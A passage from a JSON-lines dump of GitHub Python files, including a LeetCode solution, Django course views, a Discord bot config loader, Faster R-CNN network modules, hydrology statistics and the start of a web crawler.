SuggestionCommands(client)","repo_name":"Xorol/rushk","sub_path":"commands/suggestions.py","file_name":"suggestions.py","file_ext":"py","file_size_in_byte":5820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28180068202","text":"class Solution(object):\n def sumEvenAfterQueries(self, nums, queries):\n \"\"\"\n :type nums: List[int]\n :type queries: List[List[int]]\n :rtype: List[int]\n \"\"\"\n # Time Complexity: O(n^2) Space: O(n)\n res = []\n\n for i in range(len(queries)):\n index = queries[i][1]\n nums[index] = nums[index] + queries[i][0]\n idx = 0\n sums = 0\n\n while idx < len(nums):\n if nums[idx] % 2 == 0:\n sums += nums[idx]\n\n idx += 1\n\n res.append(sums)\n\n if len(res) == 0:\n res.append(0)\n\n return res\n\n\n","repo_name":"boshika/cs-ds-prep","sub_path":"leetcode/ Sum_of_Even_Numbers_After_Queries.py","file_name":" Sum_of_Even_Numbers_After_Queries.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32834736466","text":"from fuzzywuzzy import fuzz\n\n#throw out words with the highest frequency\nstop_words = [\n 'brokerage',\n 'corp',\n 'corporate',\n 'advisor',\n 'commercial',\n 'investment',\n 'organization',\n 'enterpises',\n 'holding',\n 'development',\n 'management',\n 'commercial',\n 'realty',\n 'estate',\n 'group',\n 'properties',\n 'company',\n 'associates',\n 'partners',\n 'inc',\n 'co',\n 'services',\n 'llc',\n 'property',\n]\nall_words = [word for sub_list in [item.split() for item in list(corpus)] for word in sub_list]\nfrom collections import defaultdict\n\nsome_dict = defaultdict(list)\nthreshold_value = 75\nfor word in stop_words:\n for curr_word in all_words:\n if fuzz.ratio(word, curr_word) > threshold_value:\n some_dict[word].append(curr_word)\n","repo_name":"asharma567/deduping_and_fuzzy_matching","sub_path":"stop_word_generator.py","file_name":"stop_word_generator.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14857541857","text":"#_*_encoding:utf-8_*_\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.db.models import Q\n\n\nfrom .models import Course,Video\nfrom operation.models import UserFavorite,UserCourse,CourseComments\n\n# Create your views here.\nclass CourseView(View):\n def get(self,request):\n all_courses=Course.objects.all().order_by(\"add_time\")\n\n #课程搜索\n search_keywords=request.GET.get('keywords', \"\")\n if search_keywords:\n #i 不区分大小写\n all_courses=all_courses.filter(Q(name__icontains=search_keywords)|Q(des__icontains=search_keywords)|Q(detail__icontains=search_keywords))\n\n sort = request.GET.get('sort', \"\")\n if sort:\n if sort == \"hot\":\n all_courses = all_courses.order_by(\"-click_nums\")\n elif sort == \"students\":\n all_courses = all_courses.order_by(\"-students\")\n\n # 课程计数\n course_nums = all_courses.count()\n\n # 热门课程\n hot_courses = Course.objects.all().order_by(\"-click_nums\")[:3]\n\n # 对课程进行分页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n # Provide Paginator with the request object for complete querystring generation\n\n p = Paginator(all_courses, 3, request=request)\n\n courses = p.page(page)\n\n\n return render(request,\"course-list.html\",{\n 'sa':'course',\n 'all_courses':courses,\n 'hot_courses':hot_courses,\n 'sort':sort\n })\n\n\nclass CourseDetailView(View):\n def get(self,request,course_id):\n course=Course.objects.get(id=int(course_id))\n\n #点击数逻辑\n course.click_nums=course.click_nums+1\n course.save()\n\n #我要学习\n msg='我要学习'\n if request.user.is_authenticated():\n if UserCourse.objects.filter(user=request.user,course=course):\n msg='正在学习'\n\n #课程机构收藏显示\n org_msg=\"收藏\"\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course.course_org.id,fav_type=2):\n org_msg=\"已收藏\"\n\n\n course_msg = \"收藏\"\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course.id, fav_type=1):\n course_msg = \"已收藏\"\n\n #推荐课程\n relate_courses=[]\n tag=course.tag\n if tag:\n relate_courses=Course.objects.filter(tag=tag)\n relate_courses=relate_courses.exclude(id=course_id)\n\n return render(request,'course-detail.html',{\n 'course':course,\n 'course_id':course_id,\n 'course_msg':course_msg,\n 'org_msg':org_msg,\n 'msg':msg,\n 'related_courses':relate_courses,\n 'sa':'course'\n })\n\n\nclass AddLearnView(View):\n\n def post(self,request):\n user_id=request.user.id\n course_id = request.POST.get('course_id', 0)\n\n course = Course.objects.get(id=course_id)\n\n #增加学习课程的数据记录\n if request.user.is_authenticated():\n user_course=UserCourse()\n\n #判断是否存在记录\n exist_records = UserCourse.objects.filter(user_id=int(user_id), course_id=int(course_id))\n if not exist_records:\n user_course.user_id=user_id\n user_course.course_id=course_id\n user_course.save()\n #更新课程学习人数\n students=UserCourse.objects.filter(course_id=int(course_id)).count()\n course.students=students\n course.save()\n\n return HttpResponse('{\"status\":\"transfer\",\"msg\":\"正在学习\"}', content_type='application/json')\n else:\n exist_records.delete()\n\n # 更新课程学习人数\n students = UserCourse.objects.filter(course_id=int(course_id)).count()\n course.students = students\n course.save()\n\n return HttpResponse('{\"status\":\"concel\",\"msg\":\"我要学习\"}', content_type='application/json')\n\n\n else:\n return HttpResponse('{\"status\":\"fail\",\"msg\":\"用户未登录\"}', content_type='application/json')\n\n\nclass CourseVideoView(View):\n def get(self,request,course_id):\n course = Course.objects.get(id=course_id)\n return render(request,'course-video.html',{\n 'course':course,\n 'comment_or_video': \"video\",\n 'sa':'course'\n })\n\n\nclass CourseCommentView(View):\n def get(self,request,course_id):\n course=Course.objects.get(id=course_id)\n all_comments=course.coursecomments_set.all()\n return render(request,'course-comment.html',{\n 'course':course,\n 'comment_or_video':\"comment\",\n 'sa':'course',\n 'all_comments':all_comments\n })\n\n\nclass AddCommentView(View):\n def post(self,request):\n course_id=request.POST.get('course_id',\"0\")\n comments=request.POST.get('comments',\"\")\n\n if request.user.is_authenticated():\n course_comments=CourseComments()\n course_comments.course_id=course_id\n course_comments.user_id=request.user.id\n course_comments.comments=comments\n course_comments.save()\n return HttpResponse('{\"status\":\"success\",\"msg\":\"评论成功\"}', content_type='application/json')\n\n else:\n return HttpResponse('{\"status\":\"success\",\"msg\":\"用户未登陆\"}', content_type='application/json')\n\n\nclass VideoView(View):\n def get(self,request,video_id):\n if request.user.is_authenticated():\n video=Video.objects.get(id=video_id)\n course=video.lesson.course\n if UserCourse.objects.filter(user=request.user,course=course):\n return render(request,'video_things.html',{\n 'video_url':video.video_url\n })","repo_name":"mimota1994/MxOnline","sub_path":"apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17185440888","text":"import sys\r\n\r\n\r\ndef back_tracking(idx):\r\n ans.append(int(idx))\r\n for j in range(0, int(idx[-1])):\r\n back_tracking(idx + str(j))\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n\r\n n = int(input())\r\n\r\n ans = []\r\n\r\n if n > 1022:\r\n print(-1)\r\n else:\r\n for i in range(10):\r\n back_tracking(str(i))\r\n\r\n print(sorted(ans)[n])","repo_name":"parkchanbin54/boj","sub_path":"백준/Gold/1038. 감소하는 수/감소하는 수.py","file_name":"감���하는 수.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73962136570","text":"# skeleton code for project 2\n# vis 142 fall 2022 \n# This can take 20 minutes to hours to run.\n\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\nimport random\nimport time\nimport animation\n\nstart_time = time.time()\n\nwidth = 1920 \nheight = 1080 \nclock = pygame.time.Clock()\npygame.init()\nscreen = pygame.display.set_mode((width, height))\nscreen.fill((0,0,0))\nframe_num = 0\n\n# this function makes one second of black frames\ndef make_black():\n global frame_num\n screen.fill((0,0,0))\n pygame.display.update()\n for i in range(0, 60):\n # pygame.image.save(screen, \"./frames/\" + str(frame_num) + \".png\")\n frame_num = frame_num + 1\n clock.tick(60)\n \nframes = [pygame.image.load(\"1.png\"), pygame.image.load(\"2.png\"), pygame.image.load(\"3.png\"), pygame.image.load(\"4.png\")]\nframeTime = [8,6,9,11]\nrepeat = True\n\nframes = [pygame.image.load(\"1.png\"), pygame.image.load(\"2.png\"), pygame.image.load(\"3.png\"), pygame.image.load(\"4.png\")]\nframeTime = [2,2,2,2]\nrepeat = True\n\nanim = animation.animation(frames, frameTime, repeat)\nx = 200\n# here is the main animation loop\nfor i in range(0, 20*60): # 20*60 frames is 20 seconds\n #########################################################\n # in the skeleton, your animation goes from here ########\n #########################################################\n \n anim.update(screen, pygame.Rect(x,200,10,10))\n x = x + 1\n #########################################################\n # to here ###############################################\n #########################################################\n # print out stats\n \n # The next line can be commented out to speed up testing frame rate\n # by not writing the file. But for output to final frames,\n # you will need to ucomment it.\n # pygame.image.save(screen, \"./frames/\" + str(frame_num) + \".png\")\n frame_num = frame_num + 1\n pygame.display.update()\n clock.tick(60)\n\n# print out stats\nprint(\"seconds:\", int(time.time() - start_time))\nprint(\"~minutes: \", int((time.time() - start_time)/60))\nprint(frame_num)\n# we just quit here\npygame.display.quit()\npygame.quit()\nexit()\n\n# you can make your files into a movie with ffmpeg:\n# ffmpeg -r 60 -start_number 1000000 -s 4096x2160 -i %d.png -vcodec libx264 -crf 5 -pix_fmt yuv420p final.mp4\n# with a few changes such as to start number, but this is just extra info here\n","repo_name":"Jackcool81/animation1","sub_path":"skel.py","file_name":"skel.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18721616499","text":"\"\"\"Manages the configuration file for the entire application. By default,\nthe applications configuration file name is 'config.int'.\nPerforms basic error checking on the configuration file as well.\n\"\"\"\nimport pathlib\nimport configparser\nfrom typing import Optional\n\nCONFIG_FILENAME = 'config.ini'\n\n\nclass DiscordConfig:\n \"\"\"Configuration Settings for Discords API.\"\"\"\n\n def __init__(self, config: configparser.SectionProxy) -> None:\n self._config = config\n\n @property\n def token(self) -> str:\n \"\"\"Token for access to Discord API.\n Default: unset\n \"\"\"\n val = self._config.get('Token', fallback='unset')\n if not val:\n return \"unset\"\n return val\n\n @property\n def prefix(self) -> str:\n \"\"\"Command prefix for the bot to register what is a command.\n Default: [\n \"\"\"\n val = self._config.get('Prefix', fallback='[')\n if val is None or val == \"\":\n return '['\n return val\n\n @property\n def owner_id(self) -> int:\n \"\"\"Owner of the bots Discord ID, it is most likely a large integer.\n Default: 0\n \"\"\"\n return self._config.getint('OwnerId', 0)\n\n @property\n def ccserver_dm_id(self) -> int:\n \"\"\"DM Channel ID of the bots command server.\n Default: 0\n \"\"\"\n return self._config.getint('CCDMId', 0)\n\n\nclass GeneralConfig:\n \"\"\"General configurations, parent to all sub-configurations.\"\"\"\n\n def __init__(self, config: configparser.ConfigParser) -> None:\n self._config = config\n\n # Throw an error since Discord config is essential for running.\n if not config.has_section('DISCORD'):\n raise ValueError(\"'DISCORD' is unset in configuration file.\")\n self._discord = DiscordConfig(config['DISCORD'])\n\n @property\n def discord(self) -> DiscordConfig:\n \"\"\"Discord configurations.\"\"\"\n return self._discord\n\n @property\n def debug(self) -> bool:\n \"\"\"Controls if the program is running in DEBUG mode.\n Default: 'False'\n \"\"\"\n return self._config.getboolean('DEFAULT', 'Debug', fallback=False)\n\n @staticmethod\n def make_default_config() -> bool:\n \"\"\"Creates a default configuration for the application. The file will\n be titled CONFIG_FILENAME ('config.ini' by default.)\n \"\"\"\n # If the file exists ignore.\n if pathlib.Path(CONFIG_FILENAME).is_file():\n return False\n\n # Initialize each category and the default values.\n config = configparser.ConfigParser()\n config['DEFAULT'] = {}\n config['DEFAULT']['Debug'] = 'False'\n config['DISCORD'] = {}\n config['DISCORD']['Token'] = 'unset'\n config['DISCORD']['Prefix'] = '['\n config['DISCORD']['OwnerId'] = '0'\n config['DISCORD']['CCDMId'] = '0'\n\n # Save it locally.\n with open(CONFIG_FILENAME, 'w', encoding='utf-8') as configfile:\n config.write(configfile)\n return True\n\n @staticmethod\n def load_config() -> Optional['GeneralConfig']:\n \"\"\"Attempts to load the local configuration file into memory.\"\"\"\n # Cannot load a non-existing file.\n if not pathlib.Path(CONFIG_FILENAME).is_file():\n return None\n\n config = configparser.ConfigParser()\n config.read(CONFIG_FILENAME)\n\n if not config.has_section('DISCORD'):\n raise ValueError(\"'DISCORD' section missing from configuration.\")\n\n try:\n token = config.get('DISCORD', 'Token', fallback='unset')\n if token == 'unset':\n raise ValueError()\n except (ValueError, Exception) as err:\n raise ValueError(\"invalid values in configuration file.\") from err\n return GeneralConfig(config)\n","repo_name":"Ohkthx/uboot","sub_path":"uboot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"41279596040","text":"# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Xinlei Chen\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport math\nimport torchvision.models as models\nfrom model.faster_rcnn.faster_rcnn_SCL import _fasterRCNN\n#from model.faster_rcnn.faster_rcnn_imgandpixellevel_gradcam import _fasterRCNN\nfrom model.utils.config import cfg\n\nimport pdb\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\ndef conv1x1(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride,\n padding=0, bias=False)\n\nclass netD_forward1(nn.Module):\n def __init__(self):\n super(netD_forward1, self).__init__()\n self.conv1 = nn.Conv2d(256, 256, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv2 = nn.Conv2d(256, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self._init_weights()\n def _init_weights(self):\n def normal_init(m, mean, stddev, truncated=False):\n \"\"\"\n weight initalizer: truncated normal and random normal.\n \"\"\"\n # x is a parameter\n if truncated:\n m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n else:\n m.weight.data.normal_(mean, stddev)\n #m.bias.data.zero_()\n normal_init(self.conv1, 0, 0.01)\n normal_init(self.conv2, 0, 0.01)\n normal_init(self.conv3, 0, 0.01)\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n feat = F.avg_pool2d(x, (x.size(2), x.size(3)))\n return feat\n\nclass netD_forward2(nn.Module):\n def __init__(self):\n super(netD_forward2, self).__init__()\n self.conv1 = nn.Conv2d(512, 256, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv2 = nn.Conv2d(256, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self._init_weights()\n def _init_weights(self):\n def normal_init(m, mean, stddev, truncated=False):\n \"\"\"\n weight initalizer: truncated normal and random normal.\n \"\"\"\n # x is a parameter\n if truncated:\n m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n else:\n m.weight.data.normal_(mean, stddev)\n #m.bias.data.zero_()\n normal_init(self.conv1, 0, 0.01)\n normal_init(self.conv2, 0, 0.01)\n normal_init(self.conv3, 0, 0.01)\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n feat = F.avg_pool2d(x, (x.size(2), x.size(3)))\n return feat\n\nclass netD_forward3(nn.Module):\n def __init__(self):\n super(netD_forward3, self).__init__()\n self.conv1 = nn.Conv2d(512, 256, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv2 = nn.Conv2d(256, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self._init_weights()\n def _init_weights(self):\n def normal_init(m, mean, stddev, truncated=False):\n \"\"\"\n weight initalizer: truncated normal and random normal.\n \"\"\"\n # x is a parameter\n if truncated:\n m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n else:\n m.weight.data.normal_(mean, stddev)\n #m.bias.data.zero_()\n normal_init(self.conv1, 0, 0.01)\n normal_init(self.conv2, 0, 0.01)\n normal_init(self.conv3, 0, 0.01)\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n feat = F.avg_pool2d(x, (x.size(2), x.size(3)))\n return feat\n\n\nclass netD_inst(nn.Module):\n def __init__(self, fc_size=2048):\n super(netD_inst, self).__init__()\n self.fc_1_inst = nn.Linear(fc_size, 1024)\n self.fc_2_inst = nn.Linear(1024, 256)\n self.fc_3_inst = nn.Linear(256, 2)\n self.relu = nn.ReLU(inplace=True)\n #self.softmax = nn.Softmax()\n #self.logsoftmax = nn.LogSoftmax()\n # self.bn = nn.BatchNorm1d(128)\n self.bn2 = nn.BatchNorm1d(2)\n\n def forward(self, x):\n x = self.relu(self.fc_1_inst(x))\n x = self.relu((self.fc_2_inst(x)))\n x = self.relu(self.bn2(self.fc_3_inst(x)))\n return x\n\nclass netD1(nn.Module):\n def __init__(self,context=False):\n super(netD1, self).__init__()\n self.conv1 = nn.Conv2d(256, 256, kernel_size=1, stride=1,\n padding=0, bias=False)\n self.conv2 = nn.Conv2d(256, 128, kernel_size=1, stride=1,\n padding=0, bias=False)\n self.conv3 = nn.Conv2d(128, 1, kernel_size=1, stride=1,\n padding=0, bias=False)\n self.context = context\n self._init_weights()\n def _init_weights(self):\n def normal_init(m, mean, stddev, truncated=False):\n \"\"\"\n weight initalizer: truncated normal and random normal.\n \"\"\"\n # x is a parameter\n if truncated:\n m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n else:\n m.weight.data.normal_(mean, stddev)\n #m.bias.data.zero_()\n normal_init(self.conv1, 0, 0.01)\n normal_init(self.conv2, 0, 0.01)\n normal_init(self.conv3, 0, 0.01)\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n if self.context:\n feat = F.avg_pool2d(x, (x.size(2), x.size(3)))\n x = self.conv3(x)\n return F.sigmoid(x),feat\n else:\n x = self.conv3(x)\n return F.sigmoid(x)\n\nclass netD2(nn.Module):\n def __init__(self,context=False):\n super(netD2, self).__init__()\n self.conv1 = conv3x3(512, 512, stride=2)\n self.bn1 = nn.BatchNorm2d(512)\n self.conv2 = conv3x3(512, 128, stride=2)\n self.bn2 = nn.BatchNorm2d(128)\n self.conv3 = conv3x3(128, 128, stride=2)\n self.bn3 = nn.BatchNorm2d(128)\n self.fc = nn.Linear(128,2)\n self.context = context\n self.leaky_relu = nn.LeakyReLU(negative_slope=0.2, inplace=True)\n def forward(self, x):\n x = F.dropout(F.relu(self.bn1(self.conv1(x))),training=self.training)\n x = F.dropout(F.relu(self.bn2(self.conv2(x))),training=self.training)\n x = F.dropout(F.relu(self.bn3(self.conv3(x))),training=self.training)\n x = F.avg_pool2d(x,(x.size(2),x.size(3)))\n x = x.view(-1,128)\n if self.context:\n feat = x\n x = self.fc(x)\n if self.context:\n return x,feat\n else:\n return x\n\n\nclass netD3(nn.Module):\n def __init__(self,context=False):\n super(netD3, self).__init__()\n self.conv1 = conv3x3(512, 512, stride=2)\n self.bn1 = nn.BatchNorm2d(512)\n self.conv2 = conv3x3(512, 128, stride=2)\n self.bn2 = nn.BatchNorm2d(128)\n self.conv3 = conv3x3(128, 128, stride=2)\n self.bn3 = nn.BatchNorm2d(128)\n self.fc = nn.Linear(128,2)\n self.context = context\n self.leaky_relu = nn.LeakyReLU(negative_slope=0.2, inplace=True)\n def forward(self, x):\n x = F.dropout(F.relu(self.bn1(self.conv1(x))),training=self.training)\n x = F.dropout(F.relu(self.bn2(self.conv2(x))),training=self.training)\n x = F.dropout(F.relu(self.bn3(self.conv3(x))),training=self.training)\n x = F.avg_pool2d(x,(x.size(2),x.size(3)))\n x = x.view(-1,128)\n if self.context:\n feat = x\n x = self.fc(x)\n if self.context:\n return x,feat\n else:\n return x\n\nclass netD_dc(nn.Module):\n def __init__(self):\n super(netD_dc, self).__init__()\n self.fc1 = nn.Linear(2048,100)\n self.bn1 = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100,100)\n self.bn2 = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100,2)\n def forward(self, x):\n x = F.dropout(F.relu(self.bn1(self.fc1(x))),training=self.training)\n x = F.dropout(F.relu(self.bn2(self.fc2(x))),training=self.training)\n x = self.fc3(x)\n return x\n\nclass vgg16(_fasterRCNN):\n def __init__(self, classes, pretrained=False, class_agnostic=False,gc1=False, gc2=False, gc3=False):\n self.model_path = cfg.VGG_PATH\n self.dout_base_model = 512\n self.pretrained = pretrained\n self.class_agnostic = class_agnostic\n self.gc1 = gc1\n self.gc2 = gc2\n self.gc3 = gc3\n\n _fasterRCNN.__init__(self, classes, class_agnostic,self.gc1,self.gc2, self.gc3)\n\n def _init_modules(self):\n vgg = models.vgg16()\n if self.pretrained:\n print(\"Loading pretrained weights from %s\" %(self.model_path))\n state_dict = torch.load(self.model_path)\n vgg.load_state_dict({k:v for k,v in state_dict.items() if k in vgg.state_dict()})\n\n vgg.classifier = nn.Sequential(*list(vgg.classifier._modules.values())[:-1])\n\n # not using the last maxpool layer\n #print(vgg.features)\n self.RCNN_base1 = nn.Sequential(*list(vgg.features._modules.values())[:14])\n self.RCNN_base2 = nn.Sequential(*list(vgg.features._modules.values())[14:21])\n self.RCNN_base3 = nn.Sequential(*list(vgg.features._modules.values())[21:-1])\n #print(self.RCNN_base1)\n #print(self.RCNN_base2)\n self.netD1 = netD1()\n self.netD_forward1 = netD_forward1()\n self.netD2 = netD2()\n self.netD_forward2 = netD_forward2()\n self.netD3 = netD3()\n self.netD_forward3 = netD_forward3()\n feat_d = 4096\n feat_d += 128\n feat_d += 128\n feat_d += 128\n\n # Fix the layers before conv3:\n self.netD_inst = netD_inst(fc_size = feat_d)\n\n for layer in range(10):\n for p in self.RCNN_base1[layer].parameters(): p.requires_grad = False\n\n # self.RCNN_base = _RCNN_base(vgg.features, self.classes, self.dout_base_model)\n\n self.RCNN_top = vgg.classifier\n\n self.RCNN_cls_score = nn.Linear(feat_d, self.n_classes)\n if self.class_agnostic:\n self.RCNN_bbox_pred = nn.Linear(feat_d, 4)\n else:\n self.RCNN_bbox_pred = nn.Linear(feat_d, 4 * self.n_classes)\n\n\n def _head_to_tail(self, pool5):\n \n pool5_flat = pool5.view(pool5.size(0), -1)\n fc7 = self.RCNN_top(pool5_flat)\n\n return fc7\n\n","repo_name":"harsh-99/SCL","sub_path":"lib/model/faster_rcnn/vgg16_SCL.py","file_name":"vgg16_SCL.py","file_ext":"py","file_size_in_byte":11159,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"78"} +{"seq_id":"30418979282","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 8 22:42:00 2022\n\n@author: rq.aita\n\"\"\"\n\nimport pandas as pd\nfrom datetime import date, timedelta\n\ndef read_data(file):\n # Leitura do dado\n df = pd.read_excel(file, header=None)\n i = df.iloc[0, 0].date()\n f = df.iloc[-1, 0].date()\n \n # Início e fim da série\n print(\"Início da série:\", i)\n print(\"Fim da série:\", f)\n return df, i, f\n\n\ndef daily_scale(df, i, f):\n # Criação das listas de dia, mês e ano\n dia = []\n mes = []\n ano = []\n \n while i <= f: # enquanto há dia na série\n dia.append(i.day)\n mes.append(i.month)\n ano.append(i.year)\n i += timedelta(days=1)\n \n return pd.DataFrame({'dia':dia, 'mes':mes, 'ano':ano, 'data':df.loc[:, 1]})\n\n\ndef month_scale(df, i, f):\n # Criação das listas de dia, mês e ano\n mes = []\n ano = []\n media = []\n\n for a in range(i.year, f.year + 1): # para todos os anos\n df_year = df[df['ano'] == a]\n \n if i.year == f.year:\n i_mes = i.month\n f_mes = f.month\n elif a == i.year:\n i_mes = i.month\n f_mes = 12\n elif a == f.year:\n i_mes = 1\n f_mes = f.month \n else:\n i_mes = 1\n f_mes = 12\n\n for m in range(i_mes, f_mes + 1): # para todos os meses do ano\n df_month = df_year[df_year['mes'] == m]\n mes.append(m)\n media.append(df_month[\"data\"].mean())\n ano.append(a)\n\n return pd.DataFrame({'mes':mes, 'ano':ano, 'data':media})\n\n\ndef year_scale(df, i, f):\n # Criação das listas de dia, mês e ano\n ano = []\n media = []\n\n for a in range(i.year, f.year + 1): # para todos os anos\n df_year = df[df['ano'] == a]\n media.append(df_year[\"data\"].mean())\n ano.append(a)\n\n return pd.DataFrame({'ano':ano, 'data':media})\n\n\ndef multiple_scales(df, i, f):\n df_dia = daily_scale(df, i, f)\n df_mes = month_scale(df_dia, i, f)\n df_ano = year_scale(df_mes, i, f)\n \n return df_dia, df_mes, df_ano\n\n\ndef descriptive_stats(data):\n \n N = data.count() # size of the series\n mean = round(data.mean(), 2)\n std = round(data.std(), 2)\n var = round(data.var(), 2)\n q1 = round(data.quantile(q=0.25), 2)\n q2 = round(data.quantile(q=0.5), 2)\n q3 = round(data.quantile(q=0.75), 2)\n AIQ = round(q3 - q1, 2)\n xmax = round(data.max(), 2)\n xmin = round(data.min(), 2)\n A = round(xmax - xmin, 2)\n cvar = round(100 * std / mean, 0)\n skew = round(data.skew(), 3)\n kurt = round(data.kurtosis(), 3)\n\n desc_stats = {}\n desc_stats['Tamanho'] = [N , '-']\n desc_stats['Média'] = [mean, 'm3/s']\n desc_stats['Desvio padrão'] = [std , 'm3/s']\n desc_stats['Variância'] = [var , 'm6/s2']\n desc_stats['Primeiro quartil'] = [q1 , 'm3/s']\n desc_stats['Mediana'] = [q2 , 'm3/s']\n desc_stats['Terceiro quartil'] = [q3 , 'm3/s']\n desc_stats['Amplitude inter-quartil'] = [AIQ , 'm3/s']\n desc_stats['Máximo'] = [xmax, 'm3/s']\n desc_stats['Mínimo'] = [xmin, 'm3/s']\n desc_stats['Amplitude'] = [A , 'm3/s']\n desc_stats['Coeficiente de variação'] = [cvar, '%']\n desc_stats['Assimetria'] = [skew, '-']\n desc_stats['Curtose'] = [kurt, '-']\n\n desc_stats = pd.DataFrame(desc_stats).transpose()\n desc_stats.columns = ['Valor', 'Unidade']\n \n print(desc_stats)\n return desc_stats\n\n\ndef activ_2_stats(file):\n # Leitura dos dados\n df, i, f = read_data(file)\n \n # Múltiplas escalas\n df_dia, df_mes, df_ano = multiple_scales(df, i, f)\n \n # Anual\n data = df_ano[\"data\"]\n print(\"Anual\")\n desc_stats_ano = descriptive_stats(data)\n print(\"\\n\")\n \n # Diário\n data = df_dia[\"data\"]\n print(\"Diário\")\n desc_stats_dia = descriptive_stats(data)\n print(\"\\n\")\n \n # Mensal\n desc_stats_mes = []\n for m in range(1, 13):\n data = df_mes[df_mes[\"mes\"] == m][\"data\"]\n print(\"Mês:\", m)\n desc_stats_mes.append(descriptive_stats(data))\n print(\"\\n\")\n \n return desc_stats_ano, desc_stats_dia, desc_stats_mes, df, i, f\n\n\n#%%\n\nfiles = [\n \"flow_sjp.xlsx\", \"prec_sjp.xlsx\",\n \"flow_xgu.xlsx\", \"prec_xgu.xlsx\",\n]\n\ndesc_serie = [\n \"Vazão SJP\", \"Precipitação SJP\",\n \"Vazão XGU\", \"Precipitação XGU\",\n]\n\nfor file, title in zip(files, desc_serie):\n print(title)\n _, _, _, _, _, _ = activ_2_stats(file)","repo_name":"rqaita/stats-hydro","sub_path":"activ_2/.ipynb_checkpoints/activ_2-checkpoint.py","file_name":"activ_2-checkpoint.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19466550264","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom urlparse import urlparse\nimport json\nfrom elasticsearch import Elasticsearch\nimport sys\n\nclass PageInfoModel:\n\tdef __init__(self,title,url,content):\n\t\tself.title = title\n\t\tself.url = url\n\t\tself.content = content\n\n\tdef to_json(self):\n\t\treturn json.dumps(self.__dict__)\n\ndef get_pages_info_models(startUrl,depth=2,printLog=True):\n\tmainUrl = urlparse(startUrl)\n\traw = requests.get(startUrl).content\n\tsoup = BeautifulSoup(raw,'html.parser')\n\tyield get_model(soup,startUrl)\n\treviewedUrls = set([startUrl])\n\tif not depth:\n\t\traise StopIteration\n\n\tnextUrls = [(link,1) for link in get_condition_links(soup)]\n\n\twhile len(nextUrls):\n\t\t(link, currentDepth) = nextUrls.pop(0)\n\t\turl = '{}://{}{}'.format(mainUrl.scheme,mainUrl.netloc,link)\n\t\tif url in reviewedUrls:\n\t\t\tcontinue\n\t\tif printLog:\n\t\t\tprint('Analyzing {}'.format(url))\n\t\traw = requests.get(url).content\n\t\tsoup = BeautifulSoup(raw,'html.parser')\n\t\tyield get_model(soup,url)\n\t\treviewedUrls.add(url)\n\t\tif currentDepth < depth:\n\t\t\tnextUrls.extend([(link,currentDepth+1) for link in get_content_links(soup)])\n\n\ndef 